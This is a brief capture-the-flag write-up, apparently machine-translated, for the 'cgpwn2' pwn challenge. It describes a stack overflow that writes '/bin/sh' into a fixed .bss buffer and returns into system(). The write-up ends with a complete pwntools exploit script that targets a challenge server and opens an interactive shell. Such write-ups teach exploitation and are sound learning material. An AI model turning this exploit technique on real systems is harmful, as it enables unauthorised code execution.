0x01 looking for loopholes
checksec
ida analysis
Enter hello () function
exist get () function stack overflow
- name in the bss section, fixed address
- Fgets function which can be used to write stuff
- When calling the system function, but not / bin / sh
0x02 analyzed using
By stack overflow, call system function, and write "/ bin / sh" in the name, the address of the parameter is set to name the first address, you can getshell the
0x03 attack
#!usr/bin/python
from pwn import *
io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")
context.log_level = 'debug'
sys_addr = 0x08048420
io.recvuntil("your name")
io.sendline("/bin/sh")
bin_sh_addr = 0x0804A080
io.recvuntil("leave some message here:")
payload = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()